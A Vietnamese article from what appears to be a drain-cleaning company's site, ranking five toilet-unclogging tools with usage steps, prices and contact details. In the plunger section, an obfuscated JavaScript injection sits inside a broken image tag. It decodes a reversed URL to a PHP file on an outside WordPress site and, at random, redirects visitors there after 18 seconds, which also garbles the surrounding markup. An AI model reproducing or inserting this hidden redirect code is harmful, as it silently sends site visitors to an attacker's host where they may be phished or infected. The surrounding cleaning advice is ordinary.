Top 5 đồ thông bồn cầu hiệu quả nhất hiện nay và cách sử dụng

Bồn cầu bị tắc nghẽn là hiện tượng phổ biến và thường xuyên. Bị xảy ra trong mỗi gia đình. Và tình trạng này nếu kéo dài sẽ gây ảnh hưởng rất nhiều.  Đến chất lượng cuộc sống của gia đình chúng ta. Vậy làm sao để thông bồn cầu một cách tốt nhất cũng như hiệu quả. Hãy theo dõi bài viết top 5 đồ thông bồn cầu hiệu quả nhất hiện nay và cách sử dụng. Bên dưới đây và áp dụng với những trường hợp của bạn nhé.

Các phương pháp thông tắc bồn cầu cơ bản

Bồn cầu nhà bạn đang bị tắc nghẽn. Và sẽ làm cho gia đình bạn gặp phiền toái khi sinh hoạt cũng như đi vệ sinh.

Để trước khi bắt đầu thì chúng ta nên thực hiện các bước sau:

– Bật thông gió hoặc mở cửa cho thoáng khí và để mùi bay ra.

– Đeo găng tay cao su để bảo vệ cũng như giữ vệ sinh cho chính mình.

đồ thông tắc bồn cầu
Bồn cầu luôn bị tắc luôn thường xuyên xảy ra trong mỗi gia đình chúng ta

Sau đây là những cách thông tắc bồn cầu bằng phương pháp cơ bản:

– Sử dụng thụt pit-tông cao su:

Trường hợp này chỉ áp dụng cho các trường hợp tắc không phải vật rắn như giấy hay túi nilong.

Bước tiếp theo bạn cho thụt bồn cầu vào lỗ bạn cần ấn chậm và chắc. Nhấn đến khi pit-tông lút xuống khỏi mặt nước sau đó dừng lại. Nếu chưa được mọi người có thể thực hiện tiếp và xả thêm một ít nước vào bồn cầu.

– Sử dụng móc quần áo với các vật bị tắc nằm gần ở miệng bồn cầu.

Bẻ móc treo quần áo thẳng ra:

Bạn nhét một đầu móc áo vào trong ống cống bồn cầu. Một khi đã vào trong bạn cần nhẹ nhàng xoay và đẩy để thông vật gây tắc nghẽn.

1/ Dụng cụ thông tắc bồn cầu đa năng

Sau khi chúng ta sử dụng bồn cầu. Hoặc bồn rửa mặt một thời gian. Có rất nhiều chất thải li ti bị tích tụ lại. Khiến cho chúng bị tắc nghẽn và không thể sử dụng được sẽ bốc mùi hôi khó chịu. Khi đó giải pháp tốt nhất của chúng ta chính là. Sử dụng, dụng cụ thông tắc bồn cầu đa năng. Một sản phẩm rất cần thiết cho mỗi gia đình. Bởi vì tính ưu việt rất cao của nó.

Tính năng nổi bật của dụng cụ thông tắc bồn cầu đa năng

– Dụng cụ thông tắc bồn cầu là dịch vụ rất hữu dụng. Là lựa chọn tuyệt vời cho việc thông tắc cống bồn cầu và toilet. Cũng như thông tắc cống bồn tắm khi bị tắc nghẽn.

Dụng cụ thông tắc bồn cầu đa năng
Dụng cụ thông tắc bồn cầu đa năng

– Dụng cụ thông tắc cống và bồn cầu siêu mạnh.

– Có thể áp dụng cho bồn cầu và bồn tắm hoặc bồn rửa mặt.

– Dụng cụ thông tắc bồn cầu được trang bị bốn đầu máy. Để thay đổi tùy mục đích mà bạn sử dụng.

– Ống dẫn khí rất ổn định và hoạt động mạnh mẽ.

2/ Dụng cụ thông bồn cầu bằng hơi

Việc bạn tìm mua dụng cụ thông bồn cầu ở đâu. Sẽ thường là câu hỏi được đặt ra. Mỗi khi chúng ta rơi vào tình cảnh tắc nghẽn bồn cầu. Tuy nhiên trước khi chúng ta có ý định mua. Thì bạn hãy tìm hiểu những công cụ thông tắc chuyên dụng. Cũng như phổ biến  nhất hiện nay. Chúng ta nên sử dụng loại đồ thông bồn cầu nào cho hiệu quả nhất. Và tránh được trường hợp tiền mất mà bồn cầu chưa được thông.

Dụng cụ súng bắn hơi có sẽ nguyên lí hoạt động tương tự. Như là bơm thụt bồn cầu. Đều sử dụng áp lực của không khí để thông tắc. Nhưng điểm khác biệt của súng bắn hơi là ở cấu tạo.

Dụng cụ này cũng được chia thành ba bộ phận: 1 đầu là chụp cao su và 1 đầu là ống bơm và phần giữa là ống chứa khí.

Dụng cụ thông tắc bồn cầu bằng súng bắn hơi
Dụng cụ thông tắc bồn cầu bằng súng bắn hơi

Cách sử dụng súng bắn hơi cũng không quá khó. Thực hiện bơm và để tạo một lượng không khí vừa đủ trong ống chứa. Và sau đó bóp nhẹ còi bấm thì dụng cụ sẻ được kích hoạt tạo ra một lực đẩy rất mạnh.

Với thiết kế này bạn sẽ giải quyết được vấn đề tắc bồn cầu của bạn.

3/ Dụng cụ thông tắc bồn cầu bằng khí nén

Đây là một trong những thiết bị thông tắc vô cùng hiện đại. Được sử dụng khí nén vô cùng áp lực có thể lên đến 15kg nên sức công phá cực mạnh. Có thể loại bỏ nhanh các vật cản chỉ sau 1s.

Dụng cụ thông tắc bồn cầu khí nén
Dụng cụ thông tắc bồn cầu khí nén

Cách sử dụng vô cùng đơn giản. Bạn chỉ cần kéo đầu bơm thực hiện nén hơi liên tục 10 lần. Rồi sau đó đặt súng vào bồn cầu rồi bấm bốp còi thôi nhé.

5 món đồ thông bồn cầu và cách sử dụng

Khi nghĩ tới những món đồ thông tắc bồn cầu. Nhiều người thường sẽ nghĩ đến các dụng cụ cồng kềnh và tốn kém.Thật ra suy nghĩ này của mọi người không sai. Bởi vì đơn vị thông tắc sẽ có đầy đủ cơ sở vật chất. Để có thể giúp bạn xử lý sự cố tắc nghẽn nhanh chóng và hiệu quả.

Xử lý nhanh các tạp bẩn trong bồn cầu sau 5 phút
Xử lý nhanh các tạp bẩn trong bồn cầu sau 5 phút

Trong thực tế thật ra nếu là sự cố tắc nghẽn nhẹ. Chúng ta hoàn toàn có thể tự xử lý ngay tại nhà. Mà vẫn rất hiệu quả và nhất là tiết kiệm hơn. Top 5 món đồ thông bồn cầu sẽ giúp bạn có thể tự xử lý. Về các sự cố tắc nghẽn cống ngay tại nhà. Không chỉ những vậy mà còn hướng dẫn bạn cách sử dụng. Về từng loại dụng cụ thông tắc cống đơn giản và hiệu quả nhất.

1/ Pit-tông thông tắc

Có rất nhiều loại cũng như kích thước pit-tông hiện nay. Hiện  đang được bán trên thị trường. Bạn có thể mua loại pit-tông có kích thước phù hợp với bồn cầu. Hoặc miệng cống thoát nước sàn nhà tắm và chậu rửa chén. Cấu tạo của pit-tông gồm là tay cầm bằng gỗ hoặc bằng nhựa và kim loại. Trên đầu thân là một nắp đế có hình dạng cái bát úp ngược. Hay là hình tương tự quả chuông chất liệu cao su.

$NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tong.jpg” alt=”Pit-tong thông tắc bồn cầu hiệu quả” width=”500″ height=”218″ /> Pit-tong thông tắc bồn cầu hiệu quả

Cách giúp bạn sử dụng pit-tông để thông tắc cống rất đơn giản. Các bạn chỉ cần nhúng phần cao su đó vào nước ấm cho mềm. Rồi sau đó đưa vào lỗ thoát bồn cầu và nhấn lên nhấn xuống sẽ giúp tạo lực đẩy. Như vậy các thứ đang bị tắc dưới đường cống xuống dưới bể phốt.

2/ Ống thụt bồn cầu

Đồ thông bồn cầu này hoạt động tương tự như pit-tông. Đều phải sử dụng lực để đẩy vật đang bị nghẹt xuống dưới hầm cầu. Ống thụt này có hình dạng giống như như một dụng cụ bơm bánh xe đạp trước đây. Nó có một nắp đế có hình dạng cái bát úp ngược. Hay là hình tương tự quả chuông chất liệu cao su.

Thông tắc bòn cầu bằng ống tụt cao su
Thông tắc bòn cầu bằng ống tụt cao su

Cách sử dụng đồ thông bồn cầu này cũng cực kỳ đơn giản. Bạn cần phải nhún phần cao su này vào nước ấm. Sau đó đặt nó vào lỗ thoát bồn cầu. Bạn thực hiện bơm ống thụt như bơm xe đạp. Nó sẽ tạo lực đẩy vật đang bị nghẹt xuống dưới hầm cầu.

3/ Dây lò xo quay tay

Đây là một trong những đồ thông bồn cầu vô cùng hiệu quả. Dây lò xo quay tay này được thiết kế với một đầu là dây lò xo xoắn. Có độ dài từ 3m – 20m được nối với đầu còn lại là tay quay cố định. Thiết bị này có chất liệu chính là nhựa và sắt với khối lượng trung bình là 0,5 kg trở lên. Dây lò xo này rất dễ cầm nắm và sử dụng.

Thông tắc bồn cầu bằng lò xo quay tay
Thông tắc bồn cầu bằng lò xo quay tay

Cách thông tắc bồn cầu bằng dây lò xo quay tay. Bạn phải đưa đầu dây lò xo vào miệng cống. Sau đó dùng tay đưa lò xo qua khúc ngoặc. Tiếp theo bạn cần thực hiện quay đầu tay cầm theo chiều kim đồng hồ. Sau đó bạn phải chú ý vừa quay vừa đẩy để di chuyển lò xo. Vào trong sâu hơn trong nơi vị trí rác thải đang bị kẹt.

Do đầu của lò xo được thiết kế đặc thù bằng các vòng xoắn thưa rộng. Sẽ rất dễ dàng giữ lấy rác thải kéo ra ngoài. Bạn có thể làm liên tục một vài lần sẽ giúp lôi hết rác ra ngoài.

4/ Bột thông cống

Chúng ta có thể tìm mua bột thông cống ở cửa hàng điện nước hoặc siêu thị. Mọi người có thể dùng bột thông cống để thông bồn cầu. Và cống thoát nước sàn nhà tắm cực kỳ hiệu quả. Nên mang găng tay và đeo khẩu trang khi thực hiện phương pháp này. Nó sẽ giúp đảm bảo vệ sinh. Cũng như giữ an toàn cho làn da và sức khỏe của bạn.

bột thông cống sifa
Bột thông cống sifa xử lý tắc bồn cầu nhanh chóng

Mọi người nên đọc kỹ hướng dẫn trước khi sử dụng. Để phát huy hiệu quả tốt nhất và nên để bột thông tắc này qua đêm. Thì dưới cống sẽ giúp phát huy hiệu quả hơn. Sáng hôm sau bạn tỉnh dậy chỉ cần xả nước là xong.

5/ Móc treo quần áo thông bồn cầu

Móc treo quần áo sẽ giúp thông tắc bể phốt hiệu quả. Các bạn cần lấy một chiếc móc kim loại tháo ra. Và trong đó một đầu quấn giẻ để khi thực hiện thông tắc. Nó sẽ tránh gây trầy xước men bồn cầu.

Thông tắc bồn cầu bằng móc treo quần áo
Thông tắc bồn cầu bằng móc treo quần áo

Bước kế tiếp bạn đưa đầu móc treo có buộc giẻ vào trong họng bồn cầu. Bạn cần đẩy sâu móc vào bên trong. Chúng ta đẩy đến khi cảm thấy khó đẩy thì tiếp tục đẩy mạnh. Vì lúc này rất có thể bạn đã chạm vào vật làm tắc. Trong quá trình đẩy chúng ta cần lắc qua lắc lại nhằm làm tan kết cấu vật tắc nghẽn. Từ đó sẽ giúp bồn cầu thông nhanh hơn.

>>> Xem thêm: 13 cách thông tắc bồn cầu hiệu quả tại nhà

Giá dụng cụ thông tắc bồn cầu

Dưới đây là bảng giá một số dụng cụ đồ thông tắc cống cho bạn có thể tham khảo:

STT

TÊN SẢN PHẨM GIÁ (VNĐ)

1

Pit-tong thông tắc 39.000

2

Cây bơm thụt thông tắc bồn cầu cao cấp 46.000
3 Dụng cụ thông tắc cống, kẹp gắp rác đa năng loại tốt

22.000

4 Mua dây thông tắc ống, cống 7m cống

128.000

5 Bột thông tắc cống Sifa, Hàn Quốc, Bio,…

43.000, 75.500, 79.900

Bảng giá trên chỉ mang tính chất tham khảo, giá này có thể thay đổi tùy theo biến động chung của thị trường hoặc thời điểm khách mua hàng.

Mua dụng cụ thông bồn cầu ở đâu

Hiện nay trên thị trường có rất nhiều đơn vị bán các loại đồ thông bồn cầu. Bạn có thể đến những cửa hàng tạp hóa. Hay là các siêu thị hoặc trung tâm thương mại để có thể mua.

Nhưng nếu sau khi các bạn đã sử dụng tất cả toàn bộ quy trình thông tắc. Bằng những đồ thông bồn cầu vẫn không thể nào cải thiện được tình hình tắc nghẽn. Thì chúng tôi nghĩ bạn sẽ cần đến nhờ sự trợ giúp từ dịch vụ thông tắc cống chuyên nghiệp.

Bởi vì chắc chắn rằng giải pháp này sẽ đảm bảo khắc phục sự cố triệt để. Cũng như hiện nay đặc biệt trên thị trường. Có rất nhiều công ty dịch vụ thông tắc sở hữu trang bị cũng như máy móc tiên tiến. Và cùng đội ngũ nhân viên rất chuyên nghiệp xử lý được. Với tất cả mọi tình huống tắc nghẽn khác nhau với mức giá rất hợp lý.

THÔNG TIN LIÊN HỆ:

CÔNG TY TNHH VỆ SINH MÔI TRƯỜNG MTX HƯNG YÊN

Cơ sở 1: Đối điện cổng KCN Thăng Long II – Yên Mỹ – Hưng Yên

Cơ sở 2: Số 8 Phạm Hồng Thái – Phố Hiền Nam – TP Hưng Yên

Hotline: 0986.503.800